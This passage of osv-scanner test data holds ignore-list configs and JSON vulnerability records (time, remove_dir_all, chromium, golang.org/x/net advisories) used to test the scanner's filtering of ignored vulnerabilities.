"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] } ], "experimental_config": { "call_analysis": { "enabled": false }, "licenses": { "enabled": false, "allowlist": null } } } ================================================ FILE: pkg/osvscanner/testdata/filter/some/configs/a/osv-scanner.toml ================================================ # Every vulnerability in this source is ignored. Should not show up at all after filtering. [[IgnoredVulns]] id = "GHSA-mc8h-8q98-g5hr" reason = "Ignore 1" # Alias of RUSTSEC-2023-0018 [[IgnoredVulns]] id = "RUSTSEC-2020-0071" reason = "Ignore 2" # Alias of GHSA-wcg3-cvx6-7396 ================================================ FILE: pkg/osvscanner/testdata/filter/some/configs/b/osv-scanner.toml ================================================ # golang.org/x/net is the only vulnerable package, but has multiple unique vulnerabilities. # Ignore some vulnerabilities while keeping others. Package should remain in filtered output. [[IgnoredVulns]] id = "GHSA-fxg5-wq6x-vr4w" reason = "Ignore 1" # Alias of GO-2023-1495 [[IgnoredVulns]] id = "GO-2022-1144" reason = "Ignore 2" # No aliases # GHSA-vvpx-j8f3-3w6h (and alias GO-2023-1571) should remain unfiltered. ================================================ FILE: pkg/osvscanner/testdata/filter/some/configs/c/osv-scanner.toml ================================================ # Ignore all vulnerabilities from one package (remove_dir_all), one from one package (ascii), none from other (time). # remove_dir_all should be removed from filtered output, other two packages should remain with filtered vulns. # remove_dir_all: [[IgnoredVulns]] id = "GHSA-mc8h-8q98-g5hr" reason = "Ignore 1" # Alias of RUSTSEC-2023-0018 # ascii: [[IgnoredVulns]] id = "RUSTSEC-2023-0015" reason = "Ignore 2" # No Aliases # Remaining packages/vulns: # ascii - GHSA-mrrw-grhq-86gf (no aliases) # time - GHSA-wcg3-cvx6-7396 (& alias RUSTSEC-2020-0071) ================================================ FILE: pkg/osvscanner/testdata/filter/some/input.json ================================================ { "results": [ { "source": { "path": "testdata/filter/some/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "unixodbc", "version": "2.3.11-2", "ecosystem": "Debian:10" }, "vulnerabilities": [ { "id": "CVE-2024-1013", "details": "An out-of-bounds stack write flaw was found in unixODBC on 64-bit architectures where the caller has 4 bytes and callee writes 8 bytes. This issue may go unnoticed on little-endian architectures, while big-endian architectures can be broken.", "affected": [ { "package": { "name": "unixodbc", "ecosystem": "Debian:10" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "unimportant" } } ], "references": [ { "type": "REPORT", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260823" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-1013" }, { "type": "WEB", "url": "https://github.com/lurcher/unixODBC/pull/157" } ], "modified": "2024-03-18T12:38:25Z", "published": "2024-03-18T11:15:09Z" } ], "groups": [ { "ids": [ "CVE-2024-1013" ] } ] }, { "package": { "name": "chromium", "version": "73.0.3683.75-1", "ecosystem": "Debian:10" }, "vulnerabilities": [ { "id": "CVE-2024-3847", "details": "Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low)", "affected": [ { "package": { "name": "chromium", "ecosystem": "Debian:10" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "low" } }, { "package": { "name": "chromium", "ecosystem": "Debian:11" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "ecosystem_specific": { "urgency": "low" } } ], "references": [ { "type": "ARTICLE", "url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_16.html" }, { "type": "WEB", "url": "https://issues.chromium.org/issues/328690293" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CWIVXXSVO5VB3NAZVFJ7CWVBN6W2735T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IDLUD644WEWGOFKMZWC2K7Z4CQOKQYR7/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4PCXKCOVBUUU6GOSN46DCPI4HMER3PJ/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PCWPUBGTBNT4EW32YNZMRIPB3Y4R6XL6/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOC3HLIZCGMIJLJ6LME5UWUUIFLXEGRN/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEP5NJUWMDRLDQUKU4LFDUHF5PCYAPIO/" } ], "modified": "2024-05-03T03:16:29Z", "published": "2024-04-17T08:15:10Z" } ], "groups": [ { "ids": [ "CVE-2024-3847" ] } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "aliases": null, "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all", "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)", "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "affected": [ { "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ] } ], "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ] } ], "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ] } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "aliases": [ "CVE-2020-26235" ], "summary": "Segmentation fault in time", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" } }, { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] } } ], "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" } }, { "schema_version": "1.4.0", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "aliases": [ "CVE-2020-26235" ], "summary": "Potential segfault in the time crate", "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "affected": [ { "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ] } ], "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } } } ], "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ] } ], "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ] } ] } ] }, { "source": { "path": "testdata/filter/some/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "vulnerabilities": [ { "schema_version": "1.4.0", "id": "GHSA-fxg5-wq6x-vr4w", "modified": "2023-01-24T18:56:46Z", "published": "2023-01-14T00:30:23Z", "aliases": [ "CVE-2022-41721" ], "summary": "golang.org/x/net/http2/h2c vulnerable to request smuggling attack", "details": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net/http2/h2c", "purl": "pkg:golang/golang.org/x/net/http2/h2c" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-fxg5-wq6x-vr4w/GHSA-fxg5-wq6x-vr4w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721" }, { "type": "PACKAGE", "url": "https://cs.opensource.google/go/x/net" }, { "type": "WEB", "url": "https://go.dev/cl/447396" }, { "type": "WEB", "url": "https://go.dev/issue/56352" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1495" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2023-01-20T22:40:06Z", "nvd_published_at": "2023-01-13T23:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1495", "modified": "2023-01-31T21:39:17Z", "published": "2023-01-13T22:39:40Z", "aliases": [ "CVE-2022-41721", "GHSA-fxg5-wq6x-vr4w" ], "summary": "", "details": "A request smuggling attack is possible when using MaxBytesHandler.\n\nWhen using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.0.0-20220524220425-1d687d428aca" }, { "fixed": "0.1.1-0.20221104162952-702349b0e862" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1495.json", "url": "https://pkg.go.dev/vuln/GO-2023-1495" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2/h2c", "symbols": [ "h2cHandler.ServeHTTP", "h2cUpgrade" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56352" }, { "type": "FIX", "url": "https://go.dev/cl/447396" } ] }, { "schema_version": "1.4.0", "id": "GO-2022-1144", "modified": "2023-01-31T21:39:15Z", "published": "2022-12-08T19:01:21Z", "aliases": [ "CVE-2022-41717", "GHSA-xrjj-mj9h-534m" ], "summary": "", "details": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.\n\nHTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.18.9" }, { "introduced": "1.19.0" }, { "fixed": "1.19.4" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "net/http", "symbols": [ "ListenAndServe", "ListenAndServeTLS", "Serve", "ServeTLS", "Server.ListenAndServe", "Server.ListenAndServeTLS", "Server.Serve", "Server.ServeTLS", "http2Server.ServeConn", "http2serverConn.canonicalHeader" ] } ] } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2022-1144.json", "url": "https://pkg.go.dev/vuln/GO-2022-1144" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2", "symbols": [ "Server.ServeConn", "serverConn.canonicalHeader" ] } ] } } ], "references": [ { "type": "REPORT", "url": "https://go.dev/issue/56350" }, { "type": "FIX", "url": "https://go.dev/cl/455717" }, { "type": "FIX", "url": "https://go.dev/cl/455635" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ" } ] }, { "schema_version": "1.4.0", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "aliases": [ "CVE-2022-41723" ], "summary": "Uncontrolled Resource Consumption", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" }, "ecosystem_specific": { "urgency": "unimportant" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" } }, { "schema_version": "1.4.0", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "summary": "", "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "affected": [ { "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ], "urgency": "low" } }, { "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": 